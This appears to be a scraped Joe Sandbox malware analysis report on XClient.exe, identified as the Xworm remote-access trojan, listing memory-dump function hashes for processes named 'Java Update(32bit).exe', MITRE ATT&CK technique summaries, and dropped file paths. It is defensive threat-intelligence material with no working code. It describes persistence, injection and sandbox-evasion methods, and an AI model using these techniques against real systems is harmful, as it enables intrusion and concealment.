Opcode Fuzzy Hash: 5d54da38786f409fe90eed97c2a4d3f0b0dba5a14f495743e65d00a647932fd6
Instruction Fuzzy Hash: 6E31C220A59A4D5FD348EB2CA8B98AEBF71EF89300B8049A5D419C3FCFDE341901C742

Function 00007FFD9B8B1E71 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2404527086.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9b8b0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3c6d047cf2d1054377778a3e0e5decaa7ec712af3a4e2d46ab27ad0ccd877f
Instruction ID: 31bf7ca125bf03d2a38fa82618e2d5d1acb3fb0a96e2cf4f5784edcad2b588fa
Opcode Fuzzy Hash: 0a3c6d047cf2d1054377778a3e0e5decaa7ec712af3a4e2d46ab27ad0ccd877f
Instruction Fuzzy Hash: B7012B11E1E7D84FE751A73858654767FE1DF96300B0804AAE484CA0E7DE146A448782

Analysis Process: Java Update(32bit).exePID: 7956, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B8A1CA1 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f13dadcbf2538462789d47565485a1122377bd78636d88038d4e8a1c495f65b6
Instruction ID: cf0a5fa01b468ed52fe8dbb297b0a1f4e9eda1d1edd084fb6309c510ca2d8d58
Opcode Fuzzy Hash: f13dadcbf2538462789d47565485a1122377bd78636d88038d4e8a1c495f65b6
Instruction Fuzzy Hash: 1351FE20B1E6C90FD796AB784874675AFE5DF8B219B0801FBE099C71EBDD185806C352

Function 00007FFD9B8A0DF2 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb9664a6957301901036ea2c600be72a292c0f7fe97f0f0a9901a2e0f7c5c28c
Instruction ID: 836802ec76f781ea9f97b9bb60be4965a7bac20de6cb4fe963535bc0b82f4e66
Opcode Fuzzy Hash: fb9664a6957301901036ea2c600be72a292c0f7fe97f0f0a9901a2e0f7c5c28c
Instruction Fuzzy Hash: C731FB22F1A69E0FDB55EBA898B10ED7BB1FF55350F4502B7D089C71E3DD2868068350

Function 00007FFD9B8A0E30 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc71d3d0ad26edb79930882e9bbbf1a8628d5297676c42e77c4c9e96ee776f0a
Instruction ID: ce3c984b68e2b82844c9c9d99dde159ab0124987ff632f5490bee529f1d62e38
Opcode Fuzzy Hash: cc71d3d0ad26edb79930882e9bbbf1a8628d5297676c42e77c4c9e96ee776f0a
Instruction Fuzzy Hash: 5921E262A1AA8E0FEB55EBA888711ED7BB1FF59340F4501BAD089D71E3DD286801C351

Function 00007FFD9B8A12C9 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5faba0188f3b9d4312aa0c755887c7a3674be7914f7c2e07027806ea96cd24c
Instruction ID: aae146c9c4a5d40c1308d69c606d9716ac45e6b00b8c2e902661608b28a8e353
Opcode Fuzzy Hash: b5faba0188f3b9d4312aa0c755887c7a3674be7914f7c2e07027806ea96cd24c
Instruction Fuzzy Hash: 02718320B29A8D4FE7A8F778947D6B976E2FF89304F810079E44EC32D6DD29A901C751

Function 00007FFD9B8A0C3E Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89488560e23f9a433c50594bfc012b6435443e6d07dd472880ad27c5739a08b5
Instruction ID: 1d6296d718ce9e796ac3f01720fe275c662cd99e3ec8e1c0f53b7daaea6128af
Opcode Fuzzy Hash: 89488560e23f9a433c50594bfc012b6435443e6d07dd472880ad27c5739a08b5
Instruction Fuzzy Hash: 09512821B1EA8A0FE396A77C98655B57BD1DF8621470901FBD08CC71E7DD1CAC078352

Function 00007FFD9B8A0538 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3fc1c8330efa2b964b6c0bb38f9ffafa487263f65640119fcf17ff47d46b103
Instruction ID: 0bf1132a75a20338c3a2cf7012d244cd705490102d8a907c5692c04b1bd9a440
Opcode Fuzzy Hash: f3fc1c8330efa2b964b6c0bb38f9ffafa487263f65640119fcf17ff47d46b103
Instruction Fuzzy Hash: C631D921B189490FE798FB2C586A679A2C2EF9D219F0501BEE04EC32EBDD689C018341

Function 00007FFD9B8A0AD1 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a14510225887a2c492a03e2f0398cf79b7dba871d0b9ff6c888a9bc76b56890
Instruction ID: 370bddca0eee5ca8f400143acada0dbf12613712a7d75507b89a4b9b602d032d
Opcode Fuzzy Hash: 0a14510225887a2c492a03e2f0398cf79b7dba871d0b9ff6c888a9bc76b56890
Instruction Fuzzy Hash: 0E31E561F199494FEB58BBBC5C2A7BC77D1EF98611F0502B7E01DC32D6DE2868028352

Function 00007FFD9B8A0985 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cd482cb2abdf94485e5a56433830d4ae8e4a0ae8426151b6abd2d9e5bba2288
Instruction ID: 0efd6c2e9444b5472f49341cf46042781b7d6a9edf7df4713794bbe315074192
Opcode Fuzzy Hash: 7cd482cb2abdf94485e5a56433830d4ae8e4a0ae8426151b6abd2d9e5bba2288
Instruction Fuzzy Hash: C8319130B19A4D8FEB48EBA8D866AFDB7E1FF98304F9441B5D019D32D6DE3868018751

Function 00007FFD9B8A0868 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65c5e8e24a279c0fc395a339adba6075183bebd73a96890e31d0a22b775a5f80
Instruction ID: bf73c65b7236e98d1e618102a5473c439d9abc510abe1599a2bc30a0eb4618fb
Opcode Fuzzy Hash: 65c5e8e24a279c0fc395a339adba6075183bebd73a96890e31d0a22b775a5f80
Instruction Fuzzy Hash: B73188207189CD8FE399F75898799E9BBE1EF85204B9081E5D498D33DBDD3868018792

Function 00007FFD9B8A1E71 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2485765007.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b8a0000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd8b73afabe3d542611bbab6c3105cdc187720e2294bca81067bc86c5824c9
Instruction ID: 4e567ee7a2b55783fde7f3aecef6c61006e642db1e1bc196b33eee381e72129d
Opcode Fuzzy Hash: 80fd8b73afabe3d542611bbab6c3105cdc187720e2294bca81067bc86c5824c9
Instruction Fuzzy Hash: 86012611A0E7C88FE751B73858664727FE0DF96204B0804ABE888C60E7E9186A54C392

Analysis Process: Java Update(32bit).exePID: 5724, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B880DF2 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2941996582.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b880000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8d8f1b871fd1b546ead46d3d7d8742826640ec8bb27d54c2708a581dc412fe
Instruction ID: 4b08bfee088f203ba1bbd52ac600f7828c48e81ff0a19b0d413b4b8ef62e14b9
Opcode Fuzzy Hash: bd8d8f1b871fd1b546ead46d3d7d8742826640ec8bb27d54c2708a581dc412fe
Instruction Fuzzy Hash: 2C312B22F19A9E0FEB55F768D8B11E97BB1FF98250B490177C099DB1E3DD2428068340

Function 00007FFD9B880E30 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2941996582.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b880000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2402e77594abad91d089feeceadf1562b1c972f4395afa75ca672958f31bb812
Instruction ID: aad2ef109f9ea737d712abe5d36c70e5720ef373f476327a910cfcb63d08a6c9
Opcode Fuzzy Hash: 2402e77594abad91d089feeceadf1562b1c972f4395afa75ca672958f31bb812
Instruction Fuzzy Hash: A921C761A19E8F0FEB55E7A8C8B15E97BB1FF58240F49017AD069D71E3DD3869018341

Function 00007FFD9B8812C9 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2941996582.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b880000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 909da809c17b30eb4dfc86afc33a0f7d3f465aa5106649b62c0fd6476b3744e7
Instruction ID: 748879e5abbfe7a2378f431ac2a13420947efea71a6f5e9bba7fa1f884ed100a
Opcode Fuzzy Hash: 909da809c17b30eb4dfc86afc33a0f7d3f465aa5106649b62c0fd6476b3744e7
Instruction Fuzzy Hash: C5718320B29A4D4FD798B77894796F976A2FF89704F810079E41EC32D6DE38A901C751

Function 00007FFD9B880C3E Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2941996582.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b880000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d723a756026fd28d28f61e6d8d424378560d27c2553a703c5b23a794903e2eb
Instruction ID: 974b0271f7a3de1b9824af1d2e856fcc71a4045b62fead4f581248d8f2c6825b
Opcode Fuzzy Hash: 8d723a756026fd28d28f61e6d8d424378560d27c2553a703c5b23a794903e2eb
Instruction Fuzzy Hash: 4B513721B1EA8A0FE3A6AB7C98255B53BD2DF8621470900FBD09CC71E7DD1C6C478352

Function 00007FFD9B880AD1 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2941996582.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b880000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7209396e7a8eb80ac59c08e9acc2fa1636da427a70d4c852fdfc8ba9c1ed595c
Instruction ID: 86c84235a611c9d90da52f35e167418a017a42b984b1f04c6c9efe3e9dad0381
Opcode Fuzzy Hash: 7209396e7a8eb80ac59c08e9acc2fa1636da427a70d4c852fdfc8ba9c1ed595c
Instruction Fuzzy Hash: 5A310521F199494FEB58BBBC582A7BC77E1EF98611F0401B7E01DC32E6DE2868028352

Function 00007FFD9B880985 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2941996582.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b880000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b17ccfa893bc6315e3972d1c2e63b68bdc881a01f1753c2373f71fafcd3760a
Instruction ID: 9c72b06747d9e8fe00c54e942877fa3d352906b5ab6a8ac1bbe91770cfbac2e8
Opcode Fuzzy Hash: 5b17ccfa893bc6315e3972d1c2e63b68bdc881a01f1753c2373f71fafcd3760a
Instruction Fuzzy Hash: D631B430B18A1D8FEB48EBB8C865AED77A2FF98300F940575D019D72CADE386841C751

Function 00007FFD9B880868 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2941996582.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b880000_Java Update(32bit).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113a6612d8c57e0905922e7fcfcf5243b96cfdc33dcc7f5bfef6c411a8212089
Instruction ID: 26555681994ff9080919cd56322157dec20178a4de81ccf8d92265e3e10d0fa3
Opcode Fuzzy Hash: 113a6612d8c57e0905922e7fcfcf5243b96cfdc33dcc7f5bfef6c411a8212089
Instruction Fuzzy Hash: 3231A220B28A4D8FD38CF73898A58EABF62EF89204B8445B5D419C73DFDD386901C752

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report XClient.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Java Update(32bit).exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Java Update(32bit).exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wo1qzs1.nyh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25iy1vmz.1xc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_an21qkmn.cyl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2rhyebk.wxx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyftxlb3.zmu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eswv1fjy.vpg.ps1

Windows Analysis Report
XClient.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre